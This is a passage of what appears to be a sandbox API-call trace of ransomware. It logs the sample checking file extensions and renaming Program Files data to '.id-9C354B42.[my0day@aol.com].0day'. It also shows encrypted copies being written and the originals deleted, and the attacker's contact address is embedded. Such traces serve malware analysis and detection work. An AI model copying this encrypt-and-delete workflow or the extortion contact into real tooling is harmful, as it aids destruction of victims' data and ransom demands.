(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.535] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=33280) returned 1 [0036.536] CloseHandle (hObject=0x1c0) returned 1 [0036.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0036.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.536] lstrlenW (lpString=".doc") returned 4 [0036.536] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".docx") returned 5 [0036.536] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.536] lstrlenW (lpString=".pdf") returned 4 [0036.536] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".xls") returned 4 [0036.536] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".xlsx") returned 5 [0036.536] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.536] lstrlenW (lpString=".ppt") returned 4 [0036.536] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.536] lstrlenW (lpString=".zip") returned 4 [0036.536] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".rar") returned 4 [0036.536] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".bz2") returned 4 [0036.536] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.536] lstrlenW (lpString=".7z") returned 3 [0036.536] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".dbf") returned 4 [0036.537] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".1cd") returned 4 [0036.537] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".jpg") returned 4 [0036.537] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".doc") returned 4 [0036.537] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".docx") returned 5 [0036.537] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.537] lstrlenW (lpString=".pdf") returned 4 [0036.537] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".xls") returned 4 [0036.537] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".xlsx") returned 5 [0036.537] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.537] lstrlenW (lpString=".ppt") returned 4 [0036.537] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".zip") returned 4 [0036.537] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".rar") returned 4 [0036.537] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".bz2") returned 4 [0036.537] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.537] lstrlenW (lpString=".7z") returned 3 [0036.537] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.537] lstrlenW (lpString=".dbf") returned 4 [0036.538] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.538] lstrlenW (lpString=".1cd") returned 4 [0036.538] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.538] lstrlenW (lpString=".jpg") returned 4 [0036.538] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.538] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.538] lstrlenW (lpString="boxed-split.avi") returned 15 [0036.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.538] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=62976) returned 1 [0036.538] CloseHandle (hObject=0x1c0) returned 1 [0036.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0036.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0036.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0036.538] lstrlenW (lpString=".doc") returned 4 [0036.539] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".docx") returned 5 [0036.539] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.539] lstrlenW (lpString=".pdf") returned 4 [0036.539] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".xls") returned 4 [0036.539] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".xlsx") returned 5 [0036.539] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.539] lstrlenW (lpString=".ppt") returned 4 [0036.539] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0036.539] lstrlenW (lpString=".zip") returned 4 [0036.539] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".rar") returned 4 [0036.539] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".bz2") returned 4 [0036.539] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.539] lstrlenW (lpString=".7z") returned 3 [0036.539] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0036.539] lstrlenW (lpString=".dbf") returned 4 [0036.539] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.539] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.789] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0036.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0036.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0036.882] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0036.882] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0037.287] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.287] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.610] GetLastError () returned 0x0 [0037.610] ReadFile (in: hFile=0x1c8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x61d, lpOverlapped=0x0) returned 1 [0037.844] WriteFile (in: hFile=0x1cc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x620, lpOverlapped=0x0) returned 1 [0037.845] ReadFile (in: hFile=0x1c8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0037.845] WriteFile (in: hFile=0x1cc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.846] SetEndOfFile (hFile=0x1cc) returned 1 [0037.846] CloseHandle (hObject=0x1cc) returned 1 [0037.847] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.847] SetEndOfFile (hFile=0x1c8) returned 1 [0037.848] CloseHandle (hObject=0x1c8) returned 1 [0037.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.848] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0037.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.848] lstrlenW (lpString=".doc") returned 4 [0037.848] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.848] lstrlenW (lpString=".docx") returned 5 [0037.848] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.848] lstrlenW (lpString=".pdf") returned 4 [0037.848] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".xls") returned 4 [0037.849] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".xlsx") returned 5 [0037.849] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.849] lstrlenW (lpString=".ppt") returned 4 [0037.849] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString=".zip") returned 4 [0037.849] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.849] lstrlenW (lpString=".rar") returned 4 [0037.849] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".bz2") returned 4 [0037.849] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".7z") returned 3 [0037.849] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString=".dbf") returned 4 [0037.849] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString=".1cd") returned 4 [0037.849] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString=".jpg") returned 4 [0037.849] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.849] lstrlenW (lpString=".doc") returned 4 [0037.849] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".docx") returned 5 [0037.849] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.849] lstrlenW (lpString=".pdf") returned 4 [0037.849] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.849] lstrlenW (lpString=".xls") returned 4 [0037.850] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString=".xlsx") returned 5 [0037.850] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.850] lstrlenW (lpString=".ppt") returned 4 [0037.850] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.850] lstrlenW (lpString=".zip") returned 4 [0037.850] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.850] lstrlenW (lpString=".rar") returned 4 [0037.850] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString=".bz2") returned 4 [0037.850] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString=".7z") returned 3 [0037.850] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.850] lstrlenW (lpString=".dbf") returned 4 [0037.850] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.850] lstrlenW (lpString=".1cd") returned 4 [0037.850] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.850] lstrlenW (lpString=".jpg") returned 4 [0037.850] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.850] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.850] lstrlenW (lpString="SETUP.XML") returned 9 [0037.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0037.940] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2296) returned 1 [0037.940] CloseHandle (hObject=0x1d8) returned 1 [0037.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20 [0037.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0037.940] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.940] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0037.955] GetLastError () returned 0x0 [0037.955] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x8f8, lpOverlapped=0x0) returned 1 [0038.001] WriteFile (in: hFile=0x1e0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x900, lpOverlapped=0x0) returned 1 [0038.003] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0038.003] WriteFile (in: hFile=0x1e0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0038.003] SetEndOfFile (hFile=0x1e0) returned 1 [0038.003] CloseHandle (hObject=0x1e0) returned 1 [0038.004] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.004] SetEndOfFile (hFile=0x1d8) returned 1 [0038.005] CloseHandle (hObject=0x1d8) returned 1 [0038.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0038.005] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0038.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.005] lstrlenW (lpString=".doc") returned 4 [0038.005] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.005] lstrlenW (lpString=".docx") returned 5 [0038.005] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.005] lstrlenW (lpString=".pdf") returned 4 [0038.005] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.005] lstrlenW (lpString=".xls") returned 4 [0038.005] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.005] lstrlenW (lpString=".xlsx") returned 5 [0038.005] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.005] lstrlenW (lpString=".ppt") returned 4 [0038.005] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString=".zip") returned 4 [0038.006] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.006] lstrlenW (lpString=".rar") returned 4 [0038.006] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString=".bz2") returned 4 [0038.006] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString=".7z") returned 3 [0038.006] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString=".dbf") returned 4 [0038.006] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString=".1cd") returned 4 [0038.006] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString=".jpg") returned 4 [0038.006] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.006] lstrlenW (lpString=".doc") returned 4 [0038.006] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString=".docx") returned 5 [0038.006] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.006] lstrlenW (lpString=".pdf") returned 4 [0038.006] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString=".xls") returned 4 [0038.006] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString=".xlsx") returned 5 [0038.006] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.006] lstrlenW (lpString=".ppt") returned 4 [0038.006] lstrcmpiW (lpString1=".ppt", 